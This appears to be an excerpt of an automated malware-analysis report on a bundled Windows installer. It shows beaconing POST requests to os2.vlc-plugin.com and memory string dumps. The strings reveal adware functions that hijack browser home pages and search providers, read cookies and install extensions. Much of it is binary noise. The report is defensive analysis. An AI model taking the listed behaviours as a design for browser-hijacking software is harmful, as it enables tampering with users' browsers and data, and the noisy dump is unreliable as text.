0A0CzutC0HtC0QtC0VtC0NtC0NtC0OtC0RtN0U0I0DzutDtDtD0CtBzy0F0DyDyD0A0DyB0AtByDtN0W0VzuyDtFtCtN0W0S0PzutAtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzuzztAtAzyyCyDtN1L1B0A1Q1H1L1GzutCtN0T0KzuzztAtAyBtAyEtN0U0I0DzutDtDtD0CtBzy0F0DyDyD0A0DyB0AtByDtN0S0D0TzutBtDtCyCtDtAtByEtDtDtDzzyEyBzztDyBtN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0M0A0C1V0LzutDtDtD0CtBzy0F0DyDyD0A0DtN0P0E1V0M0O0D0Ezu0D0L0LtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN0R0N1T1H1Pzu1RtOtA0AtOyD0CtAyDzzzyyEzz1O1OyC1R1RyCyCtD1PtAyE1SyDtCyEzyyCtAtB1OyCyCtCzz1QyBtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyDtFtCtN0O0S0S0P0V1P1CzutAtN0O0S2VyCyEzutDtN0P0P0Nzu1B1T1G1Q1S1F2V1V1B2X1RtF1P2V1PtN0M1P1H0P1M0AzutBzzyBtN0M1P1H0P1M0TzuyDtCtCtN0M1P1H0V1L1C0AzutCzyyByEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1H1P1Q1L1T1V1E1I1T2U1P1C
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Wed, 23 Mar 2016 22:12:25 GMT
Server: nginx
Content-Length: 0
Connection: keep-alive
HTTP/1.1 404 Not Found..Content-Type: text/html..Date: Wed, 23 Mar 2016 22:12:25 GMT..Server: nginx..Content-Length: 0..Connection: keep-alive..
POST /Aff-AD/?v=3.0&c=1852028036 HTTP/1.1
Accept: */*
Host: os2.vlc-plugin.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 786
Cache-Control: no-cache
0A0CzutC0HtC0QtC0VtC0NtC0NtC0OtC0RtN0U0I0DzutDtDtD0CtBzy0F0DyDyD0A0DyB0AtByDtN0W0VzuyDtFtCtN0W0S0PzutAtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzuzztAtAzyyCyDtN1L1B0A1Q1H1L1GzutCtN0T0KzuzztAtAyBtAyEtN0U0I0DzutDtDtD0CtBzy0F0DyDyD0A0DyB0AtByDtN0S0D0TzutBtDtCyCtDtAtByEtDtDtDzzyEyBzztDyBtN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0M0A0C1V0LzutDtDtD0CtBzy0F0DyDyD0A0DtN0P0E1V0M0O0D0Ezu0D0L0LtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN0R0N1T1H1Pzu1RtOtA0AtOyD0CtAyDzzzyyEzz1O1OyC1R1RyCyCtD1PtAyE1SyDtCyEzyyCtAtB1OyCyCtCzz1QyBtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyDtFtCtN0O0S0S0P0V1P1CzutAtN0O0S2VyCyEzutDtN0P0P0Nzu1B1T1G1Q1S1F2V1V1B2X1RtF1P2V1PtN0M1P1H0P1M0AzutBzzyBtN0M1P1H0P1M0TzuyDtCtCtN0M1P1H0V1L1C0AzutCzyyByEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1H1P1Q1L1T1V1E1I1T2U1P1C
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Wed, 23 Mar 2016 22:12:30 GMT
Server: nginx
Content-Length: 0
Connection: keep-alive
HTTP/1.1 404 Not Found..Content-Type: text/html..Date: Wed, 23 Mar 2016 22:12:30 GMT..Server: nginx..Content-Length: 0..Connection: keep-alive..
Map
The Installer connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_772:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
$h.CB
$h.CB
kernel32.dll
kernel32.dll
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.0)
Inno Setup Messages (5.5.0)
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetWindowsDirectoryA
GetWindowsDirectoryA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
comctl32.dll
comctl32.dll
.uy}"
.uy}"
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Invalid variant operation"Variant method calls not supported
External exception %x
External exception %x
%original file name%.exe_772_rwx_00900000_000C5000:
.rsrc
.rsrc
6|%x=n~0
6|%x=n~0
kernel32.dllw)
kernel32.dllw)
a.aUCNM
a.aUCNM
l.Tc_It.
l.Tc_It.
Keyw
Keyw
3%Cp)
3%Cp)
r%DnI
r%DnI
.FDiag
.FDiag
Ha=.hnY`
Ha=.hnY`
?7E(AL("%s",4),"
?7E(AL("%s",4),"
#}%c!
#}%c!
u..Qi
u..Qi
4'.Yt
4'.Yt
-i.aN&,
-i.aN&,
keysK
keysK
.jw@]
.jw@]
2301654879'
2301654879'
a.thz
a.thz
Ht.HAG
Ht.HAG
tLcibD.ZPo
tLcibD.ZPo
%uhrskNr
%uhrskNr
*.*2XE
*.*2XE
.dwcnh
.dwcnh
nmhpjhc03.fcclJLO
nmhpjhc03.fcclJLO
1.2.3'
1.2.3'
THttpR
THttpR
pM.DJ?
pM.DJ?
}.EOtJ
}.EOtJ
bVsqlz3_
bVsqlz3_
T.lLp|
T.lLp|
H.NOr0
H.NOr0
,zH-S.Gg
,zH-S.Gg
.IV`F
.IV`F
w'|%C
w'|%C
.FJn`
.FJn`
.H.VZ
.H.VZ
Mozilla
Mozilla
\O.Rhn
\O.Rhn
.cjjm0).S"'b
.cjjm0).S"'b
.rdf'.fksd'
.rdf'.fksd'
fe..js
fe..js
nt_urlzi`
nt_urlzi`
Q$.Xp'Q
Q$.Xp'Q
HURL
HURL
`_Key=c
`_Key=c
Da.Agt&(-
Da.Agt&(-
%dnZC
%dnZC
Uix.obk
Uix.obk
_%tCp
_%tCp
msGu
msGu
|%F~E
|%F~E
.ke;o
.ke;o
M".rv
M".rv
Cfg.Fw
Cfg.Fw
.LqW]E).rG
.LqW]E).rG
I.hlpkI
I.hlpkI
I.dd\
I.dd\
B.ssrsko-!
B.ssrsko-!
Ãd4
Ãd4
[hx.XuRR
[hx.XuRR
HTTP_CbBXR
HTTP_CbBXR
'ExeChkSum=
'ExeChkSum=
'%s' i
'%s' i
tkA.CH
tkA.CH
OycC.Ej
OycC.Ej
2.1.0
2.1.0
%XoUa
%XoUa
8b8%SO
8b8%SO
mGOPIPE
mGOPIPE
j0Ø#
j0Ø#
.iGF>'
.iGF>'
qah`k,.nlvcbqff,-U>o
qah`k,.nlvcbqff,-U>o
z`o1caig2,.hf5b
z`o1caig2,.hf5b
J?.DD@
J?.DD@
Wx%cK
Wx%cK
W,[%S
W,[%S
_}.PYJe
_}.PYJe
.ErfjD
.ErfjD
,b%F#
,b%F#
z'%uP
z'%uP
mtcp
mtcp
wv6.Hx
wv6.Hx
QRB%u
QRB%u
EG%XoW
EG%XoW
^.bc;
^.bc;
t.OCO
t.OCO
,p.GO`
,p.GO`
EtCp
EtCp
.dcM4
.dcM4
22]%F
22]%F
CmDPN1
CmDPN1
.cfng
.cfng
Q?%9U
Q?%9U
i>@.qq
i>@.qq
9.YLJ
9.YLJ
Ii.%c
Ii.%c
D.Ke}
D.Ke}
7h .Lu
7h .Lu
$
$
.VGj,
.VGj,
WKey#
WKey#
W-'%X!
W-'%X!
.DF'NX\
.DF'NX\
"$ %),'8
"$ %),'8
$"!(&&$' )#
$"!(&&$' )#
/*-( ,'.-!$
/*-( ,'.-!$
CQHR%D
CQHR%D
&",,/- '
&",,/- '
P.reUG
P.reUG
KERNEL32.DLL
KERNEL32.DLL
advapi32.dll
advapi32.dll
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
oleaut32.dll
oleaut32.dll
shell32.dll
shell32.dll
URLMON.DLL
URLMON.DLL
user32.dll
user32.dll
version.dll
version.dll
wininet.dll
wininet.dll
HtmlUIInstallerSADLL.dll
HtmlUIInstallerSADLL.dll
_.yNFn!
_.yNFn!
0.PY:pS~
0.PY:pS~
J,"
.Rtga"Wtdx"Pwan7
-,567787%original file name%.exe_772_rwx_009D1000_00170000:
kernel32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
UrlMon
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword8
crSQLWait
%s (%s)
IMM32.DLL
AutoHotkeysHb
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewWindowStatetdOnKeyDownOnKeyPressP=OnKeyUpSystem\CurrentControlSet\Control\Keyboard Layouts\%.8xvcltest3.dllUser32.dll2301654879A`bng`@ikc-4,uUxlxs-4,Ht.HAVh-0,Cd`jiVhlxwd-0,tLcibD.ZPTThreadExecuterTScanAllWindowsCallBackDataPortuguesei\*.*2XEi.dwcnhEnmhpjhc03.fcclJLi.ulzn1E1.2.3THttpTimeOutThreadTHttpCallBackShellGx-21,\igh]ixyj-42,M.DJA`qjz``-0,ZkdkNgij.pcKcqjpc`-0,Aaj-1,gEdafa`.pMSQL error or missing databaseAn internal logic error in SQLiteOperation terminated by sqlite3_interrupt()Uses OS features not supported on host2nd parameter to sqlite3_bind out of rangesqlite3_step() has another row readysqlite3_step() has finished executingUnknown SQLite Error Codesqlite3.dllESQLiteExceptionTSQLiteDatabaseTSQLiteTableError executing SQLCould not prepare SQL statementError executing SQL statementselect [sql] from sqlite_master where [type] = 'table' and lower(name) = 'Could not prepare SQL statementSQLite is Busyhttpst%f;uSOFTWARE\Mozilla\Mozilla Firefox8SQLitinstall.rdfDoSetChromeHomePage AL=SELECT value FROM meta WHERE key='Default Search Provider ID'SELECT short_name FROM keywords WHERE id='Exception in InstallChromeExtensionRegistry:manifest.jsonUPDATE keywords SET sync_guid='UPDATE keywords SET instant_url='' WHERE id=keywords_backupDROP TABLE keywords_backupCREATE TABLE keywords_backup AS SELECT * FROM keywords ORDER BY id ASCautogenerate_keyword ||SELECT id || short_name || keyword || favicon_url || url || safe_for_autoreplace || originating_url || date_created || usage_count || input_encodings || show_in_default_list || suggest_url || prepopulate_id ||created_by_policy || instant_url || last_modified || sync_guidFROM keywords ORDER BY id ASCRemoveChromeSearchProvider - cannot removeDELETE from keywords WHERE short_name='RemoveChromeSearchProvider - exception:SELECT id FROM keywords WHERE short_name='Home URLAmazon.comeBay.comMerriam-WebsterSuggest URLOpera Preferences version 2.0; Do not edit this file while Opera is runningKey=cSuggest URL=Protocol is unsupportedRetrieved Filename from Url:Restart attempts surpassed the maximum (hXXp://New Source created, url:, httpCode:, url:hXXps://, Url:, old Url:, new Url:Switching suspended Server back to use; Url:, HttpCode:TDownloadConnection.Destroy() was called from not authorized thread (HttpCode:Unsupported 3xx redirect response, code:HNetCfg.FwMgrHNetCfg.FwAuthorizedApplication]DKizHi-4,exc-1,Hc`hk-3.GI6?0N2=.Lq;768>1-80005345000000000000000000000000000010000000000030cabinet.dllReporting failed on first attempt, second attempt is cancelled (finallizing)! Url:First report attempt failed, going for second! Url:The report failed! Url:Successfull report, Url:TUninstallExecuterTUninstallExecuter can be created only once.RootKey:RegDelKey:(FF) TUninstallExecuter.RestoreBrwAddrSearch: OpCode=(FF) TUninstallExecuter.RestoreBrwSearchProvider: OpCode=TUninstallExecuter.DoRun: Key=CJ[hx.XuDownloading Bundles data from adServer on url:BND_HTTP_CODE&ExeChkSum=Report main param:Exclusive Execution mode is switched to:Report param (pkg:), exeName:dwa.Errdwa.Statedwa.ErrHistorydwa.MaxSpddwa.AvgSpddwa.Timedwa.HttpCodedwa.PrtclCodeHistorydwa.ConnCntdwa.Optdwa.Sizedwa.Progressdwa.IsProxydwa.Restartdwa.Heurdwa.IsAccdwa.SrcNodwa.UrlGENERIC_WINDOWSNO_JAR_SUPPORTole32.dllolepro32.dllIWebBrowserIWebBrowserAppIWebBrowser24JTEWBWindowSetResizableTEWBWindowSetLeftTEWBWindowSetTopTEWBWindowSetWidthTEWBWindowSetHeightbstrUrlContextbstrUrlOnWindowSetResizableOnWindowSetLeftOnWindowSetTopOnWindowSetWidthDPOnWindowSetHeightgrfKeyStateTComTargetExecEventCmdGroupnCmdIDnCmdexecopthhctrl.ocxURLMON.DLLSHDOCLC.DLLrcmDefaultrcmDebugDontExecuteScriptsDontExecuteJavaDontExecuteActiveXDisableUrlIfEncodingUTF8EnableUrlIfEncodingUTF8CheckFontSupportsCodePageDisableSubmitUrlInUTF8EnableSubmitUrlInUTF8lpMsgPMsgpguidCmdGroupTTranslateUrlEventpchURLInppchURLOutCmdIDpszUrlpszUrlContextszPassWordErrorUrlOptionKeyPathOverrideOptionKeyPathOnTranslateUrlOnCommandExec(g'%s' is not supported.TMsgEventTKeyEventExPortPasswordpoPortraitOnKeyDown|0.7500003333333\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post PlatformUser-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(This object does not support this method (Unsupported type for Parameter with Index %dMethod call unsuccessful. %s (%s).eiOnKeyDowneiOnKeyPresseiOnKeyUpOnKeyPressHandler with EventID = %s already exists.Error on IConnectionPoint.AdviseSource don't have connection point for [%s]JS function sync-execution failed with message:] execution failed with message:.htmlMAPI32.DLLLeftPopupTPipeServerTPipeObjectTPipeServerListener|TPipeClientU2.1.0.0This exe was created with an old version of HtmlAppMaker.LOG_URLLog server Url is invalid:Sending Log to the following Url:Log Http request has failed, res:irsoMsgDialogirsoGetCurExePathirsoJoinPathirsoGetCmdLineParamirsoGetCmdLineCountirsoGetCmdLineIndexOfirsoGetCmdLineParamValueirsoGetCmdLineAllirsoRegCreateKeyirsoRegCreateKeyTreeirsoRegDeleteKeyirsoIsRegKeyExistsirsoRegListKeyValuesirsoRegListKeyKeysirsoRegSearchKeyKeysirsoRegCopyKeyirsoHttpGetDatairsoHttpGetDataInThreadirsoLibraryExecuteProcirsoLibraryExecuteProcWirsoLibraryExecuteProcWithResult!irsoLibraryExecuteProcWithResultWirsoExecuteirsoIsMutexExistsirsoCreatePipeServerirsoStopPipeServerirsoSendDataToPipeServerirsoGetCurExeCheckSumirsoSetSQLiteDllirsoGetSQLiteDllTExecArgsXH-4,njBdi-2,o-4,r.vYiexplore.exefirefox.exechrome.exesafari.exeopera.exePIPE_DATAPIPETHtmlUIExeApplogurlirsoExecutePackageirsoReportPackageErrorirsoReportPackageSkipirsoReportPackageQuitirsoReportPackageSuccessirsoReportPackageInfoirsoGetPackageFilenameFromHttpirsoGetPackageExecExitCodeirsoGetPackageExecResultirsoSetPackageRelProgressShareirsoIsFireFoxInstalledirsoIsChromeInstalledirsoIsOperaInstalledirsoGetFireFoxHomePageirsoGetChromeHomePageirsoGetOperaHomePageirsoSetFireFoxHomePageirsoSetChromeHomePageirsoSetOperaHomePageirsoSetChromeOnStartupirsoAddChromeUrlToStartupPagesirsoGetFireFoxDefaultSPirsoGetChromeDefaultSPirsoGetOperaDefaultSPirsoAddFireFoxDefaultSPFromXMLirsoAddFireFoxDefaultSPirsoSetFireFoxAddressBarirsoAddOperaDefaultSPirsoAddChromeDefaultSPirsoGetFireFoxEXEirsoGetIEEXEirsoGetChromeEXEirsoGetOperaEXEirsoGetFireFoxVerirsoGetChromeVerirsoGetOperaVerirsoLocateSQLiteirsoGetFireFoxCookieirsoGetChromeCookieirsoIsFireFoxExtensionInstalledirsoInstallFireFoxAddonirsoInstallChromeAddonirsoUninstallAddExeCmdirsoUninstallAddOpenBrowserCmdirsoUninstallAddRegistryKeyirsoUninstallExecuteirsoReportStartirsoReportInfoirsoSetExclusiveExecisroSetReportUrlAn attempt to download bundle data was denied: adServer domain name must remain the same! Url:Report Url changed dynamically from:RepUrlChanged\fuj-1,w U,P\O U,qah`k,.nlvcbqff,-U>TcUlue.PL/UnExeFile:UnExeFilez`o1caig2,.hf5b Q,0cfh)914`,,34`6;ia2f=ae-3,L11.2.1inflate 1.2.1 Copyright 1995-2003 Mark Adler3333333333333333333333383333333393333333333333338:*"*"$33383333333333333333333333333333333833338?383333333333333:*3:"$3338333333333333333Wx%cK/:%UlW,[%S_}.PYJe.Bfw%a%Cj^#%S7}~.ErfjDjx.XCmtcpMtcpCWh.CWh%CWh CWh?CWh5CWh0CWhCWh.CWh%CWh CWhCWh,CWh%CWh=CWh5CWh2CWhCWh%CWh=CWh:CWh3CWhRz(%Xt.OCO,p.GO`.dcM4X|]J7%fi22]%FCmDPN1Q?%9U"li>@.qq9.YLJIi.Ã…D.Ke}7h .LuUW4l.WYKWindowsXisrWindowsExYisrUrlkisrSQLiteTable3isrSQLite3isrSQLiteUtilshisrPipesHtmlUIExeAppWaitNamedPipeAPeekNamedPipeGetWindowsDirectoryWGetCPInfoDisconnectNamedPipeCreatePipeCreateNamedPipeAConnectNamedPipeRegQueryInfoKeyARegOpenKeyExWRegOpenKeyExARegFlushKeyRegEnumKeyWRegEnumKeyExARegDeleteKeyWRegDeleteKeyARegCreateKeyExWRegCreateKeyExARegCloseKeySetViewportOrgExShellExecuteExWShellExecuteAUnhookWindowsHookExSetWindowsHookExAMapVirtualKeyALoadKeyboardLayoutAGetKeyboardStateGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextAGetAsyncKeyStateEnumWindowsEnumThreadWindowsEnumChildWindowsActivateKeyboardLayoutGetKeyboardType"$ %),'838000=344&W!%C-7%/ *(2'-=1 0 .'7(2':- /*-( ,'.-!$$$&'('/*) ,*/.)*72-7)&)"%&$&'&",,/- 'SSSHHHK`````````````````q}#)'%%'%'%.idata.edataP.relocP.rsrcP.reUGSoftware\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoicehttp\shell\open\commandPathToExemozsqlite3.dllNo sqlite3.dllcookies.sqlite"urls_to_restore_on_startup": [ ],"urls_to_restore_on_startup": [ ]"urls_to_restore_on_startup": [ ]GetChromeDefaultSearchProviderFromDb - failed to get spid, returning default!sqlGetQueryResultEx failed!Opera\OperaOpera\operaprefs.ini\profile\operaprefs.ini\profile\opera6.ini\opera6.iniSoftware\Opera Softwarelocale\en\en.lng\profile\search.ini\search.inisearch.ini\defaults\search.iniDoRemoveOperaSearchProvider - cannot remove" was sucessfully removed but references to its HexKey: "TopResultURLFallbackFaviconURLFaviconURLFallback*.txt.partTDownloadAccelerator.Run() was ignored, since another download is currently in progress.Urls:Pause request ignored, servers without HTTP Range support will cause download restart.The source dropped range support.Uninstall\__Uninstall_.exeUninstall\uninst.datuninst.datregsvr32.exeWaiting for all the ongoing reports to complete..._EXEXE_errorUrlRegistry entry removed: HtmlUI Browser object's IE7 fallback support is now enabled.Failed to launch htmlUI from the following url:main.htmlLog server Url is not provided.Log Http request has timed out.Remote mask loading is currently not supported. mask:Please login as administrator and try again.Installer Account Name altered after at least one report already sent.isroSetReportUrl() was ignored due to lack of Privelege Mode.Installer Report Url changed after at least one report already sent..Uninstall\No help found for %s#No context-sensitive help installed$No topic-based help system installedOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersOLE error %.8x%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%sAlt Clipboard does not support Icons/Menu '%s' is already being used by another form!Control '%s' has no parent windowMetafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphicUnsupported clipboard formatInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d) Out of memory while expanding memory streamError reading %s%s%s: %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file %sCannot open file %sInvalid stream format$''%s'' is not a valid component nameAncestor for '%s' not foundExternal exception %xInterface not supported%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.Invalid variant operation!Invalid variant operation ($%.8x)Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Operation not supportedInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pPrivileged instruction(Exception %s in module %s at %p.Application Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supported!'%s' is not a valid integer value('%s' is not a valid floating point value"'%s' is not a valid currency value!'%g' is not a valid date and time'%s' is not a valid GUID valueI/O error %d